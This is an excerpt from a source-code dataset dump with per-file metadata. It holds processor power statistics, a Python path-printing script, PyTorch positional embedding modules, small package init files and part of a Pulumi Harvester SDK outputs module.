'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Peak Dynamic': 0.0142575,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Runtime Dynamic': 0.00116041,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage': 0.00384344,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage with power gating': 0.00198631,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Area': 0.0151917,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Gate Leakage': 8.00196e-05,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Peak Dynamic': 0.00527447,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Runtime Dynamic': 0.00048411,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage': 0.00181347,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage with power gating': 0.000957045,
'Instruction Fetch Unit/Branch Predictor/Peak Dynamic': 0.0597838,
'Instruction Fetch Unit/Branch Predictor/RAS/Area': 0.0105732,
'Instruction Fetch Unit/Branch Predictor/RAS/Gate Leakage': 4.63858e-05,
'Instruction Fetch Unit/Branch Predictor/RAS/Peak Dynamic': 0.0117602,
'Instruction Fetch Unit/Branch Predictor/RAS/Runtime Dynamic': 0.00113687,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage': 0.000932505,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage with power gating': 0.000494733,
'Instruction Fetch Unit/Branch Predictor/Runtime Dynamic': 0.00481532,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage': 0.0199703,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage with power gating': 0.0103282,
'Instruction Fetch Unit/Branch Target Buffer/Area': 0.64954,
'Instruction Fetch Unit/Branch Target Buffer/Gate Leakage': 0.00272758,
'Instruction Fetch Unit/Branch Target Buffer/Peak Dynamic': 0.177867,
'Instruction Fetch Unit/Branch Target Buffer/Runtime Dynamic': 0.00979174,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage': 0.0811682,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage with power gating': 0.0435357,
'Instruction Fetch Unit/Gate Leakage': 0.0589979,
'Instruction Fetch Unit/Instruction Buffer/Area': 0.0226323,
'Instruction Fetch Unit/Instruction Buffer/Gate Leakage': 6.83558e-05,
'Instruction Fetch Unit/Instruction Buffer/Peak Dynamic': 0.606827,
'Instruction Fetch Unit/Instruction Buffer/Runtime Dynamic': 0.0760805,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage': 0.00151885,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage with power gating': 0.000701682,
'Instruction Fetch Unit/Instruction Cache/Area': 3.14635,
'Instruction Fetch Unit/Instruction Cache/Gate Leakage': 0.029931,
'Instruction Fetch Unit/Instruction Cache/Peak Dynamic': 4.83937,
'Instruction Fetch Unit/Instruction Cache/Runtime Dynamic': 0.191757,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage': 0.367022,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage with power gating': 0.180386,
'Instruction Fetch Unit/Instruction Decoder/Area': 1.85799,
'Instruction Fetch Unit/Instruction Decoder/Gate Leakage': 0.0222493,
'Instruction Fetch Unit/Instruction Decoder/Peak Dynamic': 1.37404,
'Instruction Fetch Unit/Instruction Decoder/Runtime Dynamic': 0.258403,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage': 0.442943,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage with power gating': 0.166104,
'Instruction Fetch Unit/Peak Dynamic': 7.29275,
'Instruction Fetch Unit/Runtime Dynamic': 0.540848,
'Instruction Fetch Unit/Subthreshold Leakage': 0.932286,
'Instruction Fetch Unit/Subthreshold Leakage with power gating': 0.40843,
'L2/Area': 4.53318,
'L2/Gate Leakage': 0.015464,
'L2/Peak Dynamic': 0.00651431,
'L2/Runtime Dynamic': 0.00197943,
'L2/Subthreshold Leakage': 0.834142,
'L2/Subthreshold Leakage with power gating': 0.401066,
'Load Store Unit/Area': 8.80901,
'Load Store Unit/Data Cache/Area': 6.84535,
'Load Store Unit/Data Cache/Gate Leakage': 0.0279261,
'Load Store Unit/Data Cache/Peak Dynamic': 2.07651,
'Load Store Unit/Data Cache/Runtime Dynamic': 0.40546,
'Load Store Unit/Data Cache/Subthreshold Leakage': 0.527675,
'Load Store Unit/Data Cache/Subthreshold Leakage with power gating': 0.25085,
'Load Store Unit/Gate Leakage': 0.0350888,
'Load Store Unit/LoadQ/Area': 0.0836782,
'Load Store Unit/LoadQ/Gate Leakage': 0.00059896,
'Load Store Unit/LoadQ/Peak Dynamic': 0.0271564,
'Load Store Unit/LoadQ/Runtime Dynamic': 0.0271564,
'Load Store Unit/LoadQ/Subthreshold Leakage': 0.00941961,
'Load Store Unit/LoadQ/Subthreshold Leakage with power gating': 0.00536918,
'Load Store Unit/Peak Dynamic': 2.20475,
'Load Store Unit/Runtime Dynamic': 0.566543,
'Load Store Unit/StoreQ/Area': 0.322079,
'Load Store Unit/StoreQ/Gate Leakage': 0.00329971,
'Load Store Unit/StoreQ/Peak Dynamic': 0.0669631,
'Load Store Unit/StoreQ/Runtime Dynamic': 0.133926,
'Load Store Unit/StoreQ/Subthreshold Leakage': 0.0345621,
'Load Store Unit/StoreQ/Subthreshold Leakage with power gating': 0.0197004,
'Load Store Unit/Subthreshold Leakage': 0.591321,
'Load Store Unit/Subthreshold Leakage with power gating': 0.283293,
'Memory Management Unit/Area': 0.4339,
'Memory Management Unit/Dtlb/Area': 0.0879726,
'Memory Management Unit/Dtlb/Gate Leakage': 0.00088729,
'Memory Management Unit/Dtlb/Peak Dynamic': 0.0237654,
'Memory Management Unit/Dtlb/Runtime Dynamic': 0.0238628,
'Memory Management Unit/Dtlb/Subthreshold Leakage': 0.0155699,
'Memory Management Unit/Dtlb/Subthreshold Leakage with power gating': 0.00887485,
'Memory Management Unit/Gate Leakage': 0.00808595,
'Memory Management Unit/Itlb/Area': 0.301552,
'Memory Management Unit/Itlb/Gate Leakage': 0.00393464,
'Memory Management Unit/Itlb/Peak Dynamic': 0.300894,
'Memory Management Unit/Itlb/Runtime Dynamic': 0.0314367,
'Memory Management Unit/Itlb/Subthreshold Leakage': 0.0413758,
'Memory Management Unit/Itlb/Subthreshold Leakage with power gating': 0.0235842,
'Memory Management Unit/Peak Dynamic': 0.497828,
'Memory Management Unit/Runtime Dynamic': 0.0552995,
'Memory Management Unit/Subthreshold Leakage': 0.0766103,
'Memory Management Unit/Subthreshold Leakage with power gating': 0.0398333,
'Peak Dynamic': 19.0504,
'Renaming Unit/Area': 0.303608,
'Renaming Unit/FP Front End RAT/Area': 0.131045,
'Renaming Unit/FP Front End RAT/Gate Leakage': 0.00351123,
'Renaming Unit/FP Front End RAT/Peak Dynamic': 2.51468,
'Renaming Unit/FP Front End RAT/Runtime Dynamic': 0.353067,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage': 0.0308571,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage with power gating': 0.0175885,
'Renaming Unit/Free List/Area': 0.0340654,
'Renaming Unit/Free List/Gate Leakage': 2.5481e-05,
'Renaming Unit/Free List/Peak Dynamic': 0.0306032,
'Renaming Unit/Free List/Runtime Dynamic': 0.0158073,
'Renaming Unit/Free List/Subthreshold Leakage': 0.000370144,
'Renaming Unit/Free List/Subthreshold Leakage with power gating': 0.000201064,
'Renaming Unit/Gate Leakage': 0.00708398,
'Renaming Unit/Int Front End RAT/Area': 0.0941223,
'Renaming Unit/Int Front End RAT/Gate Leakage': 0.000283242,
'Renaming Unit/Int Front End RAT/Peak Dynamic': 0.731965,
'Renaming Unit/Int Front End RAT/Runtime Dynamic': 0.122033,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage': 0.00435488,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage with power gating': 0.00248228,
'Renaming Unit/Peak Dynamic': 3.58947,
'Renaming Unit/Runtime Dynamic': 0.490907,
'Renaming Unit/Subthreshold Leakage': 0.0552466,
'Renaming Unit/Subthreshold Leakage with power gating': 0.0276461,
'Runtime Dynamic': 3.95529,
'Subthreshold Leakage': 6.16288,
'Subthreshold Leakage with power gating': 2.55328}],
'DRAM': {'Area': 0,
'Gate Leakage': 0,
'Peak Dynamic': 0.7403163735067331,
'Runtime Dynamic': 0.7403163735067331,
'Subthreshold Leakage': 4.252,
'Subthreshold Leakage with power gating': 4.252},
'L3': [{'Area': 61.9075,
'Gate Leakage': 0.0484137,
'Peak Dynamic': 0.0457642,
'Runtime Dynamic': 0.0249573,
'Subthreshold Leakage': 6.80085,
'Subthreshold Leakage with power gating': 3.32364}],
'Processor': {'Area': 191.908,
'Gate Leakage': 1.53485,
'Peak Dynamic': 86.346,
'Peak Power': 119.458,
'Runtime Dynamic': 25.1154,
'Subthreshold Leakage': 31.5774,
'Subthreshold Leakage with power gating': 13.9484,
'Total Cores/Area': 128.669,
'Total Cores/Gate Leakage': 1.4798,
'Total Cores/Peak Dynamic': 86.3002,
'Total Cores/Runtime Dynamic': 25.0904,
'Total Cores/Subthreshold Leakage': 24.7074,
'Total Cores/Subthreshold Leakage with power gating': 10.2429,
'Total L3s/Area': 61.9075,
'Total L3s/Gate Leakage': 0.0484137,
'Total L3s/Peak Dynamic': 0.0457642,
'Total L3s/Runtime Dynamic': 0.0249573,
'Total L3s/Subthreshold Leakage': 6.80085,
'Total L3s/Subthreshold Leakage with power gating': 3.32364,
'Total Leakage': 33.1122,
'Total NoCs/Area': 1.33155,
'Total NoCs/Gate Leakage': 0.00662954,
'Total NoCs/Peak Dynamic': 0.0,
'Total NoCs/Runtime Dynamic': 0.0,
'Total NoCs/Subthreshold Leakage': 0.0691322,
'Total NoCs/Subthreshold Leakage with power gating': 0.0259246}} | 75.041575 | 124 | 0.681985 | 8,082 | 68,588 | 5.781737 | 0.067063 | 0.123609 | 0.112994 | 0.093477 | 0.94102 | 0.932995 | 0.920348 | 0.888974 | 0.864471 | 0.846152 | 0 | 0.131605 | 0.224398 | 68,588 | 914 | 125 | 75.041575 | 0.74679 | 0 | 0 | 0.648797 | 0 | 0 | 0.657613 | 0.048113 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
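The record above is a per-component power/area report: the slash-delimited keys encode a 'Component/Subcomponent/Metric' hierarchy, and the metrics (Peak Dynamic, Runtime Dynamic, Gate Leakage, Subthreshold Leakage) resemble McPAT output. A minimal sketch of querying such a flattened hierarchy follows; the stats literal is a hand-copied subset of the 'Processor' entry above, and the helper is illustrative, not a full parser.

# Sketch: look up metrics in a flat 'Component/Sub/Metric' dict.
stats = {
    'Runtime Dynamic': 25.1154,
    'Total Cores/Runtime Dynamic': 25.0904,
    'Total L3s/Runtime Dynamic': 0.0249573,
    'Total NoCs/Runtime Dynamic': 0.0,
}

def metric(stats, name, component=''):
    """Return `name` for `component`, using the slash-delimited key scheme."""
    return stats[f"{component}/{name}" if component else name]

total = metric(stats, 'Runtime Dynamic')
parts = sum(metric(stats, 'Runtime Dynamic', c)
            for c in ('Total Cores', 'Total L3s', 'Total NoCs'))
print(f"total={total:.4f} W, sum of parts={parts:.4f} W")  # both ~25.115 W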
2e364cdf4cade10f54e99581987c82b551222cea | 973 | py | Python | test/modulepath.py | mhils/HoneyProxy | 3772bf2317ccac0c91017208af5fe97d88fea827 | [
"MIT"
] | 116 | 2015-01-06T02:15:21.000Z | 2021-10-12T01:30:39.000Z | test/modulepath.py | mhils/HoneyProxy | 3772bf2317ccac0c91017208af5fe97d88fea827 | [
"MIT"
] | 5 | 2015-03-01T02:20:58.000Z | 2016-01-31T16:25:11.000Z | test/modulepath.py | mhils/HoneyProxy | 3772bf2317ccac0c91017208af5fe97d88fea827 | [
"MIT"
] | 27 | 2015-03-20T10:55:53.000Z | 2021-12-28T13:09:07.000Z | import inspect, os
# Python 3 prints: resolve this module's location several equivalent ways.
print(__file__)
print(os.path.abspath(__file__))
print(os.path.abspath(inspect.getfile(inspect.currentframe())))
print("===")
print(inspect.getfile(inspect.currentframe()))
print(os.path.split(inspect.getfile(inspect.currentframe()))[0])
print(os.path.split(inspect.getfile(inspect.currentframe()))[0] + "/mitmproxy")
print("===")
print(os.path.abspath(os.path.split(inspect.getfile(inspect.currentframe()))[0]))
print(os.path.abspath(os.path.split(inspect.getfile(inspect.currentframe()))[0] + "/mitmproxy"))
print(os.path.abspath(os.path.split(inspect.getfile(inspect.currentframe()))[0]) + "/mitmproxy")
print("===")
print(os.path.realpath(os.path.abspath(os.path.split(inspect.getfile(inspect.currentframe()))[0])))
print(os.path.realpath(os.path.abspath(os.path.split(inspect.getfile(inspect.currentframe()))[0] + "/mitmproxy")))
print(os.path.realpath(os.path.abspath(os.path.split(inspect.getfile(inspect.currentframe()))[0]) + "/mitmproxy")) | 48.65 | 115 | 0.743063 | 130 | 973 | 5.5 | 0.1 | 0.159441 | 0.153846 | 0.461538 | 0.965035 | 0.804196 | 0.804196 | 0.804196 | 0.804196 | 0.797203 | 0 | 0.008782 | 0.06372 | 973 | 20 | 116 | 48.65 | 0.77607 | 0 | 0 | 0.1875 | 0 | 0 | 0.060575 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.0625 | null | null | 0.9375 | 0 | 0 | 0 | null | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 9
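The script above prints the same module directory resolved a dozen ways; for comparison, a hedged Python 3 sketch of the pathlib equivalent (the "mitmproxy" sibling path is carried over from the probes above):

# pathlib collapses the abspath/split/realpath chains into one expression.
from pathlib import Path

here = Path(__file__).resolve().parent   # directory containing this module
print(here)
print(here / "mitmproxy")                # the sibling path probed above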
5ce99d7ee57a1ce12438269e35bf39851b588bc6 | 134 | py | Python | gooddata-fdw/gooddata_fdw/__init__.py | jaceksan/gooddata-python-sdk | 640bd8b679e00a5f0eb627bdf6143de078f8b59b | [
"MIT"
] | 7 | 2022-01-24T16:27:06.000Z | 2022-02-25T10:18:49.000Z | gooddata-fdw/gooddata_fdw/__init__.py | jaceksan/gooddata-python-sdk | 640bd8b679e00a5f0eb627bdf6143de078f8b59b | [
"MIT"
] | 29 | 2022-01-20T15:45:38.000Z | 2022-03-31T09:39:25.000Z | gooddata-fdw/gooddata_fdw/__init__.py | jaceksan/gooddata-python-sdk | 640bd8b679e00a5f0eb627bdf6143de078f8b59b | [
"MIT"
] | 7 | 2022-01-20T07:11:15.000Z | 2022-03-09T14:50:17.000Z | # (C) 2021 GoodData Corporation
from gooddata_fdw._version import __version__
from gooddata_fdw.fdw import GoodDataForeignDataWrapper
| 33.5 | 55 | 0.865672 | 16 | 134 | 6.8125 | 0.5625 | 0.220183 | 0.275229 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.033058 | 0.097015 | 134 | 3 | 56 | 44.666667 | 0.867769 | 0.216418 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
cf2c173ceb092651de75014f8f88b1891f64033f | 2,169 | py | Python | src/embeddings.py | nextBillyonair/Attention | 3e2dfecd63abd762633888895f3ba721c903f439 | [
"MIT"
] | null | null | null | src/embeddings.py | nextBillyonair/Attention | 3e2dfecd63abd762633888895f3ba721c903f439 | [
"MIT"
] | null | null | null | src/embeddings.py | nextBillyonair/Attention | 3e2dfecd63abd762633888895f3ba721c903f439 | [
"MIT"
] | null | null | null | import torch
from torch.nn import Module, Dropout
import math
class PositionalEmbeddings(Module):
def __init__(self, feature_len, dropout=0.1, max_seq_len=5000):
super().__init__()
self.seq_len = max_seq_len
self.feature_len = feature_len
self.dropout = Dropout(p=dropout)
        # Precompute the sinusoidal table once. h = pos / 10000**(i/d) is
        # evaluated in log-space; pos = 0 yields log(0) = -inf and
        # exp(-inf) = 0, which is exactly the value the first row needs.
        pos = torch.arange(start=0, end=self.seq_len).unsqueeze(1).float()
        i = torch.arange(0, self.feature_len, 2).float()
        h = (pos.log() - i / self.feature_len * math.log(10000)).exp()
        pe = torch.empty(self.seq_len, self.feature_len)
        pe[:, 0::2] = torch.sin(h)  # even feature indices
        pe[:, 1::2] = torch.cos(h)  # odd feature indices
        # Register as a buffer so the table follows .to(device) / state_dict.
        self.register_buffer('pe', pe)
def forward(self, encodings):
seq_len = encodings.size(1)
encodings = encodings + self.pe[:seq_len, :]
return self.dropout(encodings)
class SineEmbeddings(Module):
def __init__(self, feature_len, dropout=0.1, max_seq_len=5000):
super().__init__()
self.seq_len = max_seq_len
self.feature_len = feature_len
self.dropout = Dropout(p=dropout)
        # Precompute in log-space as above; with step=1 every feature index
        # gets a sine component.
        pos = torch.arange(start=0, end=self.seq_len).unsqueeze(1).float()
        i = torch.arange(0, self.feature_len, 1).float()
        h = (pos.log() - i / self.feature_len * math.log(10000)).exp()
        # Buffer registration keeps the table on the module's device.
        self.register_buffer('pe', torch.sin(h))
def forward(self, encodings):
seq_len = encodings.size(1)
encodings = encodings + self.pe[:seq_len, :]
return self.dropout(encodings)
class CosineEmbeddings(Module):
def __init__(self, feature_len, dropout=0.1, max_seq_len=5000):
super().__init__()
self.seq_len = max_seq_len
self.feature_len = feature_len
self.dropout = Dropout(p=dropout)
        # Precompute in log-space as above; every feature index gets a
        # cosine component.
        pos = torch.arange(start=0, end=self.seq_len).unsqueeze(1).float()
        i = torch.arange(0, self.feature_len, 1).float()
        h = (pos.log() - i / self.feature_len * math.log(10000)).exp()
        # Buffer registration keeps the table on the module's device.
        self.register_buffer('pe', torch.cos(h))
def forward(self, encodings):
seq_len = encodings.size(1)
encodings = encodings + self.pe[:seq_len, :]
return self.dropout(encodings)
| 33.369231 | 74 | 0.621024 | 299 | 2,169 | 4.287625 | 0.147157 | 0.088924 | 0.141966 | 0.053042 | 0.887676 | 0.872075 | 0.872075 | 0.872075 | 0.872075 | 0.872075 | 0 | 0.031573 | 0.240664 | 2,169 | 64 | 75 | 33.890625 | 0.746812 | 0.014753 | 0 | 0.744681 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.12766 | false | 0 | 0.06383 | 0 | 0.319149 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
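A short usage sketch for the embedding modules above, assuming the file is importable as `embeddings` (matching the src/embeddings.py path in the record); inputs are batch-first and the positional table broadcasts over the batch dimension:

# Usage sketch; module name and shapes are assumptions, not part of the file.
import torch
from embeddings import PositionalEmbeddings

emb = PositionalEmbeddings(feature_len=512, dropout=0.1)
x = torch.zeros(2, 10, 512)   # (batch, seq_len, feature_len)
y = emb(x)                    # adds the sinusoidal codes, then dropout
print(y.shape)                # torch.Size([2, 10, 512])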
cf3bed49595cde00d7db516ec8fd7bf91f8d1694 | 44 | py | Python | graph/__init__.py | Rgtemze/PersonalityRecognition | 90ddd9c02e595d685b8c395ae94d50090288d1f0 | [
"MIT"
] | 1 | 2022-02-26T08:39:31.000Z | 2022-02-26T08:39:31.000Z | graph/__init__.py | Rgtemze/PersonalityRecognition | 90ddd9c02e595d685b8c395ae94d50090288d1f0 | [
"MIT"
] | null | null | null | graph/__init__.py | Rgtemze/PersonalityRecognition | 90ddd9c02e595d685b8c395ae94d50090288d1f0 | [
"MIT"
] | null | null | null | from . import tools
from . import ntu_rgb_d
| 14.666667 | 23 | 0.772727 | 8 | 44 | 4 | 0.75 | 0.625 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.181818 | 44 | 2 | 24 | 22 | 0.888889 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
cf64f5e30f64b6648789288af20cb73e80cf6352 | 45 | py | Python | MA/gui/__init__.py | highvelcty/MediaArchivist | 2c496d032cbe4a56455f7862ffce4f82d4589a5b | [
"MIT"
] | null | null | null | MA/gui/__init__.py | highvelcty/MediaArchivist | 2c496d032cbe4a56455f7862ffce4f82d4589a5b | [
"MIT"
] | null | null | null | MA/gui/__init__.py | highvelcty/MediaArchivist | 2c496d032cbe4a56455f7862ffce4f82d4589a5b | [
"MIT"
] | null | null | null | from .cfg import make_gui_cfg
make_gui_cfg() | 15 | 29 | 0.822222 | 9 | 45 | 3.666667 | 0.555556 | 0.424242 | 0.606061 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.111111 | 45 | 3 | 30 | 15 | 0.825 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.5 | 0 | 0.5 | 0 | 1 | 1 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 7 |
cf790f5b3bd486434cd0171633b96928dc88d12d | 144 | py | Python | fastapi_apollo_middleware/__init__.py | sunhailin-Leo/fastapi_apollo_middleware | 32351406141dbd87254efd4516288a556adbe72a | [
"MIT"
] | 2 | 2021-03-26T03:54:43.000Z | 2021-03-28T10:51:19.000Z | fastapi_apollo_middleware/__init__.py | sunhailin-Leo/fastapi_apollo_middleware | 32351406141dbd87254efd4516288a556adbe72a | [
"MIT"
] | null | null | null | fastapi_apollo_middleware/__init__.py | sunhailin-Leo/fastapi_apollo_middleware | 32351406141dbd87254efd4516288a556adbe72a | [
"MIT"
] | null | null | null | from fastapi_apollo_middleware.middleware import FastAPIApolloMiddleware
from fastapi_apollo_middleware._version import __author__, __version__
| 48 | 72 | 0.916667 | 15 | 144 | 7.933333 | 0.533333 | 0.184874 | 0.285714 | 0.453782 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.0625 | 144 | 2 | 73 | 72 | 0.881481 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
d890dc8c1cef93082adf7cf2aa0ce23528b8bc76 | 19,743 | py | Python | sdk/python/pulumi_harvester/outputs.py | huaxk/pulumi-harvester | 132af964d236173f5f4ec6cad8469dd3e7ac5389 | [
"ECL-2.0",
"Apache-2.0"
] | 2 | 2021-11-27T02:09:08.000Z | 2022-03-19T02:22:55.000Z | sdk/python/pulumi_harvester/outputs.py | huaxk/pulumi-harvester | 132af964d236173f5f4ec6cad8469dd3e7ac5389 | [
"ECL-2.0",
"Apache-2.0"
] | null | null | null | sdk/python/pulumi_harvester/outputs.py | huaxk/pulumi-harvester | 132af964d236173f5f4ec6cad8469dd3e7ac5389 | [
"ECL-2.0",
"Apache-2.0"
] | null | null | null | # coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from . import _utilities
__all__ = [
'VirtualMachineCloudinit',
'VirtualMachineDisk',
'VirtualMachineNetworkInterface',
'GetVirtualMachineCloudinitResult',
'GetVirtualMachineDiskResult',
'GetVirtualMachineNetworkInterfaceResult',
]
@pulumi.output_type
class VirtualMachineCloudinit(dict):
@staticmethod
def __key_warning(key: str):
suggest = None
if key == "networkData":
suggest = "network_data"
elif key == "networkDataBase64":
suggest = "network_data_base64"
elif key == "networkDataSecretName":
suggest = "network_data_secret_name"
elif key == "userData":
suggest = "user_data"
elif key == "userDataBase64":
suggest = "user_data_base64"
elif key == "userDataSecretName":
suggest = "user_data_secret_name"
if suggest:
pulumi.log.warn(f"Key '{key}' not found in VirtualMachineCloudinit. Access the value via the '{suggest}' property getter instead.")
def __getitem__(self, key: str) -> Any:
VirtualMachineCloudinit.__key_warning(key)
return super().__getitem__(key)
def get(self, key: str, default = None) -> Any:
VirtualMachineCloudinit.__key_warning(key)
return super().get(key, default)
def __init__(__self__, *,
network_data: Optional[str] = None,
network_data_base64: Optional[str] = None,
network_data_secret_name: Optional[str] = None,
type: Optional[str] = None,
user_data: Optional[str] = None,
user_data_base64: Optional[str] = None,
user_data_secret_name: Optional[str] = None):
if network_data is not None:
pulumi.set(__self__, "network_data", network_data)
if network_data_base64 is not None:
pulumi.set(__self__, "network_data_base64", network_data_base64)
if network_data_secret_name is not None:
pulumi.set(__self__, "network_data_secret_name", network_data_secret_name)
if type is not None:
pulumi.set(__self__, "type", type)
if user_data is not None:
pulumi.set(__self__, "user_data", user_data)
if user_data_base64 is not None:
pulumi.set(__self__, "user_data_base64", user_data_base64)
if user_data_secret_name is not None:
pulumi.set(__self__, "user_data_secret_name", user_data_secret_name)
@property
@pulumi.getter(name="networkData")
def network_data(self) -> Optional[str]:
return pulumi.get(self, "network_data")
@property
@pulumi.getter(name="networkDataBase64")
def network_data_base64(self) -> Optional[str]:
return pulumi.get(self, "network_data_base64")
@property
@pulumi.getter(name="networkDataSecretName")
def network_data_secret_name(self) -> Optional[str]:
return pulumi.get(self, "network_data_secret_name")
@property
@pulumi.getter
def type(self) -> Optional[str]:
return pulumi.get(self, "type")
@property
@pulumi.getter(name="userData")
def user_data(self) -> Optional[str]:
return pulumi.get(self, "user_data")
@property
@pulumi.getter(name="userDataBase64")
def user_data_base64(self) -> Optional[str]:
return pulumi.get(self, "user_data_base64")
@property
@pulumi.getter(name="userDataSecretName")
def user_data_secret_name(self) -> Optional[str]:
return pulumi.get(self, "user_data_secret_name")
@pulumi.output_type
class VirtualMachineDisk(dict):
@staticmethod
def __key_warning(key: str):
suggest = None
if key == "accessMode":
suggest = "access_mode"
elif key == "autoDelete":
suggest = "auto_delete"
elif key == "bootOrder":
suggest = "boot_order"
elif key == "containerImageName":
suggest = "container_image_name"
elif key == "existingVolumeName":
suggest = "existing_volume_name"
elif key == "hotPlug":
suggest = "hot_plug"
elif key == "storageClassName":
suggest = "storage_class_name"
elif key == "volumeMode":
suggest = "volume_mode"
elif key == "volumeName":
suggest = "volume_name"
if suggest:
pulumi.log.warn(f"Key '{key}' not found in VirtualMachineDisk. Access the value via the '{suggest}' property getter instead.")
def __getitem__(self, key: str) -> Any:
VirtualMachineDisk.__key_warning(key)
return super().__getitem__(key)
def get(self, key: str, default = None) -> Any:
VirtualMachineDisk.__key_warning(key)
return super().get(key, default)
def __init__(__self__, *,
name: str,
access_mode: Optional[str] = None,
auto_delete: Optional[bool] = None,
boot_order: Optional[int] = None,
bus: Optional[str] = None,
container_image_name: Optional[str] = None,
existing_volume_name: Optional[str] = None,
hot_plug: Optional[bool] = None,
image: Optional[str] = None,
size: Optional[str] = None,
storage_class_name: Optional[str] = None,
type: Optional[str] = None,
volume_mode: Optional[str] = None,
volume_name: Optional[str] = None):
"""
:param str name: A unique name
"""
pulumi.set(__self__, "name", name)
if access_mode is not None:
pulumi.set(__self__, "access_mode", access_mode)
if auto_delete is not None:
pulumi.set(__self__, "auto_delete", auto_delete)
if boot_order is not None:
pulumi.set(__self__, "boot_order", boot_order)
if bus is not None:
pulumi.set(__self__, "bus", bus)
if container_image_name is not None:
pulumi.set(__self__, "container_image_name", container_image_name)
if existing_volume_name is not None:
pulumi.set(__self__, "existing_volume_name", existing_volume_name)
if hot_plug is not None:
pulumi.set(__self__, "hot_plug", hot_plug)
if image is not None:
pulumi.set(__self__, "image", image)
if size is not None:
pulumi.set(__self__, "size", size)
if storage_class_name is not None:
pulumi.set(__self__, "storage_class_name", storage_class_name)
if type is not None:
pulumi.set(__self__, "type", type)
if volume_mode is not None:
pulumi.set(__self__, "volume_mode", volume_mode)
if volume_name is not None:
